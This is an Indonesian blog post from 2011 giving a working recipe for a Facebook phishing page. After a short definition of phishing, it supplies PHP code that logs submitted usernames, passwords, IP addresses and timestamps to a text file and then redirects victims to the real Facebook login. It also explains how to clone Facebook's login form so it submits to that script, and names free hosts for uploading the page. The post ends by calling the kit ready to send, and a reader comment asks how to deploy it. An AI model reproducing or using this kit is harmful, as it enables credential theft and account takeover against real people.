phising facebook(phising password)

Diposting oleh Unknown on Jumat, 25 Februari 2011

  Menurut definisi dalam Wikipedia, phishing adalah usaha untuk mendapatkan suatu informasi penting, misalnya sandi lewat atau informasi kartu kredit, dengan cara memanfaatkan seseorang atau sebuah perusahaan bisnis yang sudah dikenal dan dipercaya oleh masyarakat, seperti bank, online retailer, dan perusahaan penerbit kartu kredit ternama. Sarana yang umumnya digunakan adalah pesan elektronik, pesan instan, dan situs jaringan palsu.Melalui sarana tersebut korban dikendalikan untuk menyerahkan informasi-informasi rahasia yang diinginkan.karena itu, phising tergolong dalam bentuk social engineering.nama ini sebetulnya merupakan akronim dari sebuah jargon, yaitu password harvesting fishing.serangan phishing menggunakan penipuan email untuk memikat penerimanya menuju situs jaringan yang tidak benar.
Penipuan e-mail pengubahan metadata/header email melalui protokol SMTP (simple mail transfer protocol) sehingga pengirim dapat memalsukan identitas dirinya menjadi pihak lain yang dikenal oleh penerima.masalah utama terjadinya praktek phishing adalah ketiadaan pemeriksaan asal e-mail.SMTP (Simple Mail Transfer Protocol) alamat apapun, sehingga phishers dapat memanfaatkannya untuk memperdaya penerima e-mail .Celakanya, sebesar 5% dari seluruh target phishing menanggapi penipuan e-mail ini

Ni cara buatnya:
1.(tulis di notepad)
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: http://www.Facebook.com/login.php");
$handle = fopen("moosoft.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>
NB: header("Location: http://www.Facebook.com/login.php"); (bisa di ganti, tergantung targetnya)
simpan pake nama next.php
2.buka lagi notepad, simpan pake nama moosoft.txt (biarin kosong)
3. yang ini agak njelimet, hehe. .
(1.pilih targetnya(misal: https://login.facebook.com/login.php)
2.lalu view source pagenya
3.paste in ke notepad.
4.Cari "action=" (ga pake quote)
5.pada action="https://login.facebook.com/login.php" agan ganti jadi action="next.php"
6.kemudian ganti juga dari "POST" menjadi "get")
simpen pake nama index.php(kalo masih bingung silakan komen di bawah)
4. tinggal di upload di hosting hosting gratis, misalnya
a.110mb.com
b.spam.com
c.007sites.com

phisingnya udah jadi dan siap di kirim, hhehe

(maaf bila ada salah kata, masih newbie)

{ 1 komentar... read them below or add one }

faisal mengatakan...

yang dipost apakah hanya file index atau keseluruhan file nya?

Posting Komentar